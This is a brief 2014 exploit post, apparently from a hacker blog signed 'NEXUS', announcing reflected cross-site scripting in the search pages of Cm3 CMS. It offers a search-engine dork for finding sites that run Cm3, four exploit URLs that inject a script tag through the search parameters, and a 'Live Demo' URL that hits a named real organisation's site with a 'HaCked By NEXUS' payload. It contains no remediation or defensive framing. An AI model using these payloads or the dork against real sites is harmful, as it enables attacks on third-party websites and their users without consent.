Tuesday, 1 July 2014

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&amp;ContainerID=&forumsearchoption=topics
http://www.NEXUS,com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&;CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&;SearchType=Default 
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&amp;x=0&y=0 
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&amp;ContainerID=&forumsearchoption=topics 

NEXUS